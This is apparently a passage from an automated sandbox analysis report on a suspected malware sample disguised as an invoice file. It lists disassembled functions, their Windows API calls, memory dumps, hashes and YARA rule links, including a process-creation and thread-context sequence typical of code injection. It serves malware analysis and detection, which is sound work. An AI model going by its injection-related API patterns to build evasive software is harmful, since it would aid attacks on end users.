                                                              • Opcode ID: 0217ee083753d1dd3def675a3a636ac91854439a18244912986462edf3476e80
                                                              • Instruction ID: c29e2a13fcd754aa3290f5a5f08bcd7c2acf7d1770b3d9606ac9e12cc8ff30ee
                                                              • Opcode Fuzzy Hash: 0217ee083753d1dd3def675a3a636ac91854439a18244912986462edf3476e80
                                                              • Instruction Fuzzy Hash: F7112770A20206ABDB11FF708C426EE36F2AF69750B158425E814D7181EB70CAF19FB1
                                                              Function 0020D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0020D28B,SwapMouseButtons,00000004,?), ref: 0020D2BC
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0020D28B,SwapMouseButtons,00000004,?,?,?,?,0020C865), ref: 0020D2DD
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,0020D28B,SwapMouseButtons,00000004,?,?,?,?,0020C865), ref: 0020D2FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: 0e5198d95d3c326e7ca3dbc75cefa520eb26a9f2e921d2c89e5a762447328414
                                                              • Instruction ID: f50f0c8415adbc4719e9fbbd4ab17c6f8bca60622086de2f2e7dc962fa1b594b
                                                              • Opcode Fuzzy Hash: 0e5198d95d3c326e7ca3dbc75cefa520eb26a9f2e921d2c89e5a762447328414
                                                              • Instruction Fuzzy Hash: 57113975A22309BFDB208FA4DC84EAF7BBCEF44744F104469E805D7151E771AE519B60
                                                              Function 00E25DE8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E265A3
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E26639
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E2665B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction ID: 5ebf0eaf5f40361aadc12c6d6dbd959825100926e8361a37e1d6678c77d5b6e2
                                                              • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction Fuzzy Hash: 2562F830A14218DBEB24CFA4D851BDEB372FF58304F1091A9D10DEB294E77A9E81CB59
                                                              Function 0023C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F4517: _fseek.LIBCMT ref: 001F452F
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C65D
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C670
                                                              • _free.LIBCMT ref: 0023C4DD
                                                              • _free.LIBCMT ref: 0023C4E4
                                                              • _free.LIBCMT ref: 0023C54F
                                                                • Part of subcall function 00211C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00217A85), ref: 00211CB1
                                                                • Part of subcall function 00211C9D: GetLastError.KERNEL32(00000000,?,00217A85), ref: 00211CC3
                                                              • _free.LIBCMT ref: 0023C557
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction ID: eb4f7f599b906b13658bdabb51fe04a91a9c4ca6f560d2dfbe8119e3d601955f
                                                              • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction Fuzzy Hash: A8514DF1914219AFDF249F64DC81BAEBBB9EF48300F1000AEF259B3251DB715A908F59
                                                              Function 0020EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 0020EBB2
                                                                • Part of subcall function 001F51AF: _memset.LIBCMT ref: 001F522F
                                                                • Part of subcall function 001F51AF: _wcscpy.LIBCMT ref: 001F5283
                                                                • Part of subcall function 001F51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001F5293
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 0020EC07
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0020EC16
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00263C88
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: f4a1762fdf743ddb221d0b341f5ff343b5e90f0a361401208c05fd58e5751533
                                                              • Instruction ID: ef8ca7a81fb94b08872c7827eb71e0ca1be0871b82a44a11745afb7f54e717a5
                                                              • Opcode Fuzzy Hash: f4a1762fdf743ddb221d0b341f5ff343b5e90f0a361401208c05fd58e5751533
                                                              • Instruction Fuzzy Hash: B721C5705147849FEB32DB289859BE6BBFC9B51308F04048EE68E66182C3B52AD48B51
                                                              Function 0023C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0023C72F
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0023C746
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: f0caf3491f46a2526d1ac18126b0bba139a0b0b5d56716ac860046691acfebf0
                                                              • Instruction ID: 912dab5ffde9a430102735cb2c1891de596ec2b3ee8049fd60c028392962e8d0
                                                              • Opcode Fuzzy Hash: f0caf3491f46a2526d1ac18126b0bba139a0b0b5d56716ac860046691acfebf0
                                                              • Instruction Fuzzy Hash: 6AD05E7154030EABDB50AB90EC0EF8AB77C9B00704F0001A07A54A50B3DAB0E6DA8B54
                                                              Function 0024F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f0b8513caa3f2d41ae67c750dae2d659a46bd067b3ae8a20779516c425b2c467
                                                              • Instruction ID: 532518a4a399b72d99d0ba545720176449872f07a39d74056e2387fd82bdbf38
                                                              • Opcode Fuzzy Hash: f0b8513caa3f2d41ae67c750dae2d659a46bd067b3ae8a20779516c425b2c467
                                                              • Instruction Fuzzy Hash: 0CF16771A183019FC714DF24C985B6AB7E5FF88314F10892EF9999B292DB70E915CF82
                                                              Function 001F4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 001F5022
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001F50CB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell__memset
                                                              • String ID:
                                                              • API String ID: 928536360-0
                                                              • Opcode ID: c845a42b145ab4d67cd062af74077c79a35b523f0ef59775c0fe360782be64cc
                                                              • Instruction ID: f3506b3ae44bbef97a171d62d651073156642c58eebd5e183b3ffc6d2b78227d
                                                              • Opcode Fuzzy Hash: c845a42b145ab4d67cd062af74077c79a35b523f0ef59775c0fe360782be64cc
                                                              • Instruction Fuzzy Hash: 63318EB1504705DFC721EF24E8556ABBBE4FF48308F000A2EF69E82241EB716994CB92
                                                              Function 0021395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00213973
                                                                • Part of subcall function 002181C2: __NMSG_WRITE.LIBCMT ref: 002181E9
                                                                • Part of subcall function 002181C2: __NMSG_WRITE.LIBCMT ref: 002181F3
                                                              • __NMSG_WRITE.LIBCMT ref: 0021397A
                                                                • Part of subcall function 0021821F: GetModuleFileNameW.KERNEL32(00000000,002B0312,00000104,00000000,00000001,00000000), ref: 002182B1
                                                                • Part of subcall function 0021821F: ___crtMessageBoxW.LIBCMT ref: 0021835F
                                                                • Part of subcall function 00211145: ___crtCorExitProcess.LIBCMT ref: 0021114B
                                                                • Part of subcall function 00211145: ExitProcess.KERNEL32 ref: 00211154
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,00000001,00000000,?,?,0020F507,?,0000000E), ref: 0021399F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: c4328da53a4e79368d8112b1a33d4901b370fa89d7dda25d56f78861b39bf5bc
                                                              • Instruction ID: 4a0c7d0248fb78a290bb5cdab313c1788d70eed1820747b8eedf5541d0ddec5a
                                                              • Opcode Fuzzy Hash: c4328da53a4e79368d8112b1a33d4901b370fa89d7dda25d56f78861b39bf5bc
                                                              • Instruction Fuzzy Hash: 1701F9353756129AE6127F24EC46BEE33D99FB1B20F200126F5059B181DFF0DDE04AA0
                                                              Function 0023C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0023C385,?,?,?,?,?,00000004), ref: 0023C6F2
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0023C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0023C708
                                                              • CloseHandle.KERNEL32(00000000,?,0023C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0023C70F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 1b44b179daf96d3d6c7f9b4b6ffe97abbf80aa73c3c8e1094a9bf0e5282c3f19
                                                              • Instruction ID: 178d95023abd0321d6356d3235c9a376630620cd0772683f6e9a2ee0a5fa39be
                                                              • Opcode Fuzzy Hash: 1b44b179daf96d3d6c7f9b4b6ffe97abbf80aa73c3c8e1094a9bf0e5282c3f19
                                                              • Instruction Fuzzy Hash: E2E08632141214B7D7212F54BC0DFCA7B29AF05761F104110FB1C791E097B125619B98
                                                              Function 0023BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0023BB72
                                                                • Part of subcall function 00211C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00217A85), ref: 00211CB1
                                                                • Part of subcall function 00211C9D: GetLastError.KERNEL32(00000000,?,00217A85), ref: 00211CC3
                                                              • _free.LIBCMT ref: 0023BB83
                                                              • _free.LIBCMT ref: 0023BB95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction ID: eabafb047efb3a0ad5b8a02f14c8cc96adb625c12d90b52170ddba6322045244
                                                              • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction Fuzzy Hash: 16E0C2E122074242CA206D386E44FF763CC0F04310B04080EBA19E314ACF30E8B088E4
                                                              Function 001F2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001F24F1), ref: 001F2303
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001F25A1
                                                              • CoInitialize.OLE32(00000000), ref: 001F2618
                                                              • CloseHandle.KERNEL32(00000000), ref: 0026503A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 3815369404-0
                                                              • Opcode ID: 53e26858eaf5611d292fe345cde7b6b3b1b41441ce952ef7219dbe9d6463f7c6
                                                              • Instruction ID: d2dc0a4fa915a43546fe28577ea1e33844dd1de80673443759539164ce1b4798
                                                              • Opcode Fuzzy Hash: 53e26858eaf5611d292fe345cde7b6b3b1b41441ce952ef7219dbe9d6463f7c6
                                                              • Instruction Fuzzy Hash: 1671DEB48112A58BC714EF6AB8B84A5BBE4FB993447E043AED909C73B2DB304474CF54
                                                              Function 00250828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _strcat.LIBCMT ref: 002508FD
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • _wcscpy.LIBCMT ref: 0025098C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                              • String ID:
                                                              • API String ID: 1012013722-0
                                                              • Opcode ID: 1d2aa8badde4d480e0f63d3bd3c0729132048c6b9fd0b2639340312d7a2316f8
                                                              • Instruction ID: 5dafc21da8fbeeb171437e7f31abfcc786aed727ceba01162704afd6294f9bf8
                                                              • Opcode Fuzzy Hash: 1d2aa8badde4d480e0f63d3bd3c0729132048c6b9fd0b2639340312d7a2316f8
                                                              • Instruction Fuzzy Hash: F8913434A20605DFCB18DF28C8D19A9B7E5EF59311B50806AED0A8F3A2DB30ED55CF84
                                                              Function 001F3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 001F3A73
                                                                • Part of subcall function 00211405: __lock.LIBCMT ref: 0021140B
                                                                • Part of subcall function 001F3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001F3AF3
                                                                • Part of subcall function 001F3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001F3B08
                                                                • Part of subcall function 001F3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,001F3AA3,?), ref: 001F3D45
                                                                • Part of subcall function 001F3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,001F3AA3,?), ref: 001F3D57
                                                                • Part of subcall function 001F3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,002B1148,002B1130,?,?,?,?,001F3AA3,?), ref: 001F3DC8
                                                                • Part of subcall function 001F3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,001F3AA3,?), ref: 001F3E48
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001F3AB3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 924797094-0
                                                              • Opcode ID: d1a640053f03be1ee485e5a362a24990741344cec60dbb59bf3cd34d94199194
                                                              • Instruction ID: fb1d337eec9a4a466bb86739a3b5e7d9eaabc56090671cbb89e49a151a15219e
                                                              • Opcode Fuzzy Hash: d1a640053f03be1ee485e5a362a24990741344cec60dbb59bf3cd34d94199194
                                                              • Instruction Fuzzy Hash: 28119071914341DBC300EF69EC4991AFBE8EF94710F004A1FF988872A2DB7095A9CF92
                                                              Function 0021E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0021EA29
                                                              • __close_nolock.LIBCMT ref: 0021EA42
                                                                • Part of subcall function 00217BDA: __getptd_noexit.LIBCMT ref: 00217BDA
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                              • String ID:
                                                              • API String ID: 1046115767-0
                                                              • Opcode ID: 07b5eb1cba07b738c54f4f50c6bddc29ee98d3d15e25dc56da84eddaf8108098
                                                              • Instruction ID: a3bd7e61dfaca9083e9aabd25f14ae9bb157c1abe0d917a8199d8b64cd9314ea
                                                              • Opcode Fuzzy Hash: 07b5eb1cba07b738c54f4f50c6bddc29ee98d3d15e25dc56da84eddaf8108098
                                                              • Instruction Fuzzy Hash: 521177729356108ADB12BF64DC467DD7AE16FA1335F1B4340E8215B1E2C7B489E08EA1
                                                              Function 0020F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0021395C: __FF_MSGBANNER.LIBCMT ref: 00213973
                                                                • Part of subcall function 0021395C: __NMSG_WRITE.LIBCMT ref: 0021397A
                                                                • Part of subcall function 0021395C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,00000001,00000000,?,?,0020F507,?,0000000E), ref: 0021399F
                                                              • std::exception::exception.LIBCMT ref: 0020F51E
                                                              • __CxxThrowException@8.LIBCMT ref: 0020F533
                                                                • Part of subcall function 00216805: RaiseException.KERNEL32(?,?,0000000E,002A6A30,?,?,?,0020F538,0000000E,002A6A30,?,00000001), ref: 00216856
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
